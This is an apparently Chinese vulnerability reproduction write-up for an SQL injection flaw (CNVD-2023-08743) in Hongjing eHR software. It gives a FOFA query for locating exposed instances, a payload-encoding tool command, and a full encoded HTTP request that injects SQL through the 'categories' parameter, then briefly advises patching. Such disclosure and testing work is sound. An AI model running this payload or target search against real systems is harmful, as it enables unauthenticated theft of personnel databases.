0x01 产品简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景eHR 存在SQL注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 影响范围

宏景eHR < 8.2

0x04 复现环境

FOFA:body='<div class="hj-hy-all-one-logo"'

0x05 漏洞复现

PoC(注入点是categories字段)

/servlet/codesettree?categories=[加密后的恶意sql]&codesetid=1&flag=c&parentid=-1&status=1

注:这里需要对hrms中的sql语句进行编码

工具地址:https://github.com/vaycore/HrmsTool

java -jar HrmsTool.jar -e "1' union all select 'hongjing',@@version--"

构造payload(查询数据库版本)

GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

复现成功

0x06 修复建议

目前软件已发布安全修复更新,受影响用户可以联系厂商获取补丁。

宏景eHR SQL注入漏洞复现(CNVD-2023-08743)相关推荐

  1. kkcms前台sql注入漏洞复现

    kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...

  2. espcms5.7.13 sql注入漏洞复现

    espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...

  3. 通达OA 11.5 SQL注入漏洞复现

    0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...

  4. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

    漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

  5. 畅捷通T+ SQL注入漏洞复现(QVD-2023-13612)

    0x01 产品简介 畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理.采购管理.库存管理等.主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化.移动化.物联网.电子 ...

  6. (CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现

    漏洞信息 漏洞名称 ApacheSkyWalking SQL注入漏洞 漏洞编号 CVE-2020-9483 危害等级 高危 漏洞类型 通用型漏洞 漏洞厂商 Apache 漏洞概述 当使用H2 / My ...

  7. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  8. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

    1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

  9. 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)

    0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...

最新文章

  1. 【CTF】实验吧 困在栅栏里的凯撒
  2. 文件属性及资源文件的使用
  3. cocos2d-x中的curl
  4. android 拍照空指针,空指针异常时嵌入照片中的Android
  5. 2015年蓝桥杯C/C++ B组题目题解
  6. access开发精要(2)-参照完整性
  7. 内联函数和编译器对Go代码的优化
  8. 【docker】常用docker命令,及一些坑
  9. java idle 机制_HotSpot VM重量级锁降级机制的实现原理
  10. 小程序Windows和linux,改进后的《自动显示天气预报》小程序(Linux和Windows环境都可以)...
  11. 互联网项目架构经验分享
  12. 祝微软北京.net俱乐部徐磊生日快乐
  13. 电脑上有什么类似全能扫描王的软件?这4款扫描app1分钟帮你搞定几十张图片
  14. GCD栅栏函数和信号量
  15. TP6 微信小程序消息推送配置Token校验失败200302
  16. 【c#】 MVC模式 ——《七天学会》系列学习心得
  17. keil 局部变量不能查看值,显示为not in scope
  18. android逆向开发工程师需要掌握的技能
  19. 邵阳市计算机学校某灿,最近喜欢上一首歌。。 大家把自己觉得好听的歌和我分享分享吧。...
  20. GX、LS型螺旋输送机结构新颖 噪声低

热门文章

  1. 微风轻抚月,此去一身空
  2. 双十一购物狂欢节,英语怎么说?
  3. 2021-05-25-文档-3
  4. 【饭谈】问:推广测试平台的ppt要怎么写?答:茶一点就可以了
  5. 股东大会上巴菲特亲传选股10招
  6. 零基础怎么快速自学会美工设计
  7. ONAP项目加入新成员推动业界发展和技术进步
  8. 调试Linux shell脚本
  9. os是android5.0,拥抱Android 5.0,技德科技发布Remix OS 1.5
  10. 前置器\MX2034-01-06-09-05-02-078-00变送器\ST5484E-121-132-00